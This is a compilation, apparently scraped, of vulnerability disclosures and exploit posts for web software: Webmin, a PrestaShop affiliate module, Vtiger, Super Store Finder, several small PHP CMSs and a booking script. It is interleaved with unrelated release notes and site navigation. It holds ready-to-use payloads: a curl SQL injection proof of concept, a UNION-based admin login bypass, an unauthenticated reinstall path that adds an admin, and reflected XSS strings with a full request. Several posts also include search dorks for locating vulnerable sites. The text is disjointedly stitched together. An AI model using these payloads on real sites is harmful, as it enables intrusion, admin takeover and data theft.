Italia Mediasky CMS version 2.0 suffers from a cross site request forgery vulnerability.

Italia Mediasky CMS 2.0 Cross Site Request Forgery

A stored cross-site scripting (XSS) vulnerability in Webmin v2.100 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cloned module name parameter.

Webmin is a web-based system administration tool for Unix-like servers, and services with about 1,000,000 yearly installations worldwide. Using it, it is possible to configure operating system internals, such as users, disk quotas, services or configuration files, as well as modify, and control open-source apps, such as **BIND** DNS Server, **Apache** HTTP Server, **PHP**, **MySQL**, and many more.

Add support for Amazon Linux 2023 Fix a bug in Network Configuration module when parsing network size Fix Netplan related bugs in Network Configuration module Fix a bug with initial focus in Terminal module Fix to correctly compare Webmin semantic versions Fix to suppress output from monitor.pl command Fix bugs when reading and replying to HTML email in Usermin Assets File Size File Size Webmin Usermin webmin-2.102-1.noarch.rpm 40.8 MB usermin-2....

Add support for reading gzipped email messages Add error\_stderr API Fix to show correct locale for sudo-capable users webmin/authentic-theme#1663 Fix new signing key import on Debian and derivatives Fix to check if password hash format is valid for yescrypt and SHA512 Fix print email functionality for Read User Mail module (for both Webmin and Usermin) Fix various XSS related issues Assets File Size File Size Webmin Usermin webmin-2.101-1.noarch.rpm 40.8 MB usermin-2....

Add full support for NetworkManager in Network Configuration module Add the Terminal module to Usermin Add support for WebGL in the Terminal module Add screen reader support in Terminal module Add significant improvements to read, reply and compose mail functionality Add support for loading images via the server when reading mail Add support for showing defaults for options in PHP Configuration module Add new pagination mode in Users and Groups module Fix correctly displaying bridges with Netplan in Network Configuration module Fix displaying active network interfaces in Network Configuration module Fix to consider current drive temperature in smartctl output #1881 Fix to properly stop Usermin usermin/issues/89 Fix no to add hashed password to the old password list twice Fix displaying placeholder on input to reflect strftime-style format Update Authentic theme to the latest version adding new vertical column layout Assets File Size File Size Webmin Usermin webmin-2....

Fix support for enabling and disabling the HTTP2 protocol Fix several bugs in the creation of AAAA and MX records Fix bugs in the management of secondary mail servers Fix creating mail forwards and auto-replies Add automatic use of Cloud credentials if available when backing up to S3 or GCS running on Amazon EC2 or Google Compute Engine

Add ability to host DNS zones on remote Webmin servers Add support for EC SSL certificates Add support for remote databases for PostgreSQL in the same way as MySQL Add an option to share the same DNS zone file with different owners

Add ability to set locale in Webmin Users module for consistency Fix to preserve initial install directory when upgrading manually Fix to preserve minimal install type when upgrading manually Fix an error when make\_date is called on undefined value #1860 Fix clearing packages caches before checking for updates in status collection #1863 Update the Authentic theme to the latest version Assets File Size webmin-2.021-1.noarch.rpm 39.6 MB webmin\_2.021\_all.deb 32.5 MB webmin-2....

Add full locale support Add slave zone file format option in BIND DNS module Add support for editing ACLs in File Manager Add support to configure SSL connection for MySQL/MariaDB module Add support for compressed backups in PostgreSQL module Add support for displaying inodes too in Disk Usage in the Dashboard Add better support for CloudLinux Fix to always default to RSA key type in Let’s Encrypt requests Fix setup repository script for Oracle Fix shutdown timeout to avoid termination of running processes Fix support for SpamAssassin 4 Fix to use system default hashing format for htpasswd file Fix FastRPC issues Update the Authentic theme to the latest version, with sped-up Dashboard performance Assets File Size webmin-2....

Fix Authentic theme issue with error handling Fix Framed theme to respect selected mode in left menu Assets File Size webmin-2.013-1.noarch.rpm 39.9 MB webmin\_2.013\_all.deb 32.7 MB webmin-2.013.tar.gz 44.9 MB webmin-2.013.pkg.gz 44.3 MB

Fix to set the correct algorithm when setting up RNDC #1817 Fix the loop bug when sourcing other network configs in Debian Fix to include all Debian network config files in backups Fix to stop doing expensive package re-fetch on upgrades Add support for defining hostname for WebSocket connection Add Debian 12 support Assets File Size webmin-2.012-1.noarch.rpm 39.9 MB webmin\_2.012\_all.deb 32.7 MB webmin-2.012.tar.gz 44.9 MB webmin-2.012.pkg.gz 44.3 MB

Add ability to set shell character encoding and set TERM environmental variable in the new Terminal module Add support for editing network interfaces in include files for Debian systems Add various improvements to the old good Framed Theme Fix to change Gray Framed Theme name to Framed Theme Fix to verify and close WebSocket session, if parent session was closed Fix to remove RC4 from the list of strong ciphers Fix don’t fail LDAP user or group deletion, if they have already been deleted Fix error handling in MySQL/MariaDB Database server module when executing SQL commands Fix adding an extra server attachment field and other bugs in Read User Mail module Fix the link to release notes for Rocky Linux Fix issues with freezing and thawing dynamic reverse zones in BIND DNS Server module Fix bugs for modules granting anonymous access Fix mailbox\_idle\_check\_interval option related bugs in Dovecot module sourceforge....

CVE-2023-40982: Webmin

Active Design psaffiliate before v1.9.8 was discovered to contain a SQL injection vulnerability via the component PsaffiliateGetaffiliatesdetailsModuleFrontController::initContent().

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Full Affiliates” (psaffiliate) up to version 1.9.7 from Active Design for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39641
*   **Published at**: 2023-08-31
*   **Platform**: PrestaShop
*   **Product**: psaffiliate
*   **Impacted release**: <= 1.9.7 (1.9.8 fixed the vulnerability)
*   **Product author**: Active Design
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method PsaffiliateGetaffiliatesdetailsModuleFrontController::initContent() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**WARNING** : This exploit is actively used to deploy a webskimmer to massively steal credit cards.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’ ajax scripts
*   Rewrite SMTP settings to hijack emails

**Proof of concept**

    curl -v 'https://preprod.X/module/psaffiliate/getaffiliatesdetails?getHasBeenReviewed=1&ids_affiliate=1);select(0x73656C65637420736C656570283432293B)INTO@a;prepare`b`from@a;execute`b`;--'
    

**Patch from 1.9.7**

    --- 1.9.7/modules/psaffiliate/controllers/front/getaffiliatesdetails.php
    +++ 1.9.8/modules/psaffiliate/controllers/front/getaffiliatesdetails.php
    @@ -30 +30 @@ class PsaffiliateGetaffiliatesdetailsModuleFrontController extends ModuleFrontCo
    -            $result = Db::getInstance()->executeS('SELECT `id_affiliate` FROM `'._DB_PREFIX_.'aff_affiliates` WHERE `id_affiliate` IN ('.pSQL($ids_affiliate).') AND `has_been_reviewed`="0"');
    +            $result = Db::getInstance()->executeS('SELECT `id_affiliate` FROM `'._DB_PREFIX_.'aff_affiliates` WHERE `id_affiliate` IN ('.implode(',', array_map('intval', explode(',', Tools::getValue('ids_affiliate')))).') AND `has_been_reviewed`="0"');
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **psaffiliate**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-04-18

Issue discovered during a code review by TouchWeb.fr

2023-04-18

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-04-19

Request a CVE ID

2023-05-09

PrestaShop Addons security Team confirm versions scope

2023-05-29

PrestaShop Addons security Team confirm author provide a patch

2023-08-29

Received CVE ID

2023-08-29

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-39641: [CVE-2023-39641] Improper neutralization of SQL parameter in Active Design - Full Affiliates module for PrestaShop

SQL injection vulnerability in Vtiger CRM v.7.5.0 allows a remote authenticated attacker to escalate privileges via the getQueryColumnsList function in ReportRun.php.

Skip to content

GitLab 

*   

Projects Groups Snippets

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   Sign in

Welcome to Vtiger Community. To gain access for account, please contact \[ community @ vtiger.com \]

*   vtiger
*   vtigercrm
*   Repository

Switch branch/tag

*   vtigercrm
*   modules
*   Reports
*   **ReportRun.php**

Find file BlameHistoryPermalink

*   Added composer support for tcpdf · 6434fc6b
    
    Prasad authored Jul 02, 2023
    
    6434fc6b
    

Copyright 2023 Vtiger. All rights reserved.

CVE-2023-38891: modules/Reports/ReportRun.php · master · vtiger / vtigercrm · GitLab

SQL injection vulnerability in Super Store Finder PHP Script v.3.6 allows a remote attacker to execute arbitrary code via a crafted payload to the username parameter.

    #Title : Super Store Finder PHP Script SQL Injection / Bypass admin login#Researcher : Etharus#Vendor : Joe Iz, https://superstorefinder.net/#Script Demo Url : https://superstorefinder.net/products/superstorefinder/#Version Affected : 3.6 and below#Date : 5 July 2023#FOFA Dork : "designed and built by Joe Iz."# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/# Step 2 : Enter following payloadusername : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -password : admin

CVE-2023-38912: Super Store Finder PHP Script 3.6 SQL Injection ≈ Packet Storm

A vulnerability was found in phpipam 1.5.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Header Handler. The manipulation of the argument X-Forwarded-Host leads to open redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239732.

CVE-2023-4965

iSmile Soft CMS version 0.3.0 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : iSmile Soft CMS v0.3.0 Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.helpernt.com/                                                                                          || # Dork      : JamalCom هذا السكربت مبرمج بواسطة                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.     It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.[+] use payload : /install.php?etape=3[+] http://127.0.0.1/iSmile/install.php?etape=3Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iSmile Soft CMS 0.3.0 Add Administrator

islamnt CMS version 2.1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : islamnt CMS v2.1.0 XSS Vulnerability Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://sourceforge.net/projects/islam-cms/                                                                        || # Dork      : Powered By Islamnt 2.1.0                                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3E[+] http://127.0.0.1/Islam/onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

islamnt CMS 2.1.0 Cross Site Scripting

Night Club Booking Software version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Night Club Booking Software-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/09/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks. Thepayload byymt"><script>alert(1)</script>fs5xr was submitted in the indexparameter. This input was echoed unmodified in the application's response.The attacker can trick the victim into executing arbitrary commands orcode on his machine remotely.STATUS: HIGH-CRITICAL Vulnerability[+]Test Payload:```GET/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;_gat=1; _fbp=fb.1.1694256177815.1029224882X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116","Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html)## Time spent:00:05:00

Night Club Booking Software 1.0 Cross Site Scripting

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

Tag

#php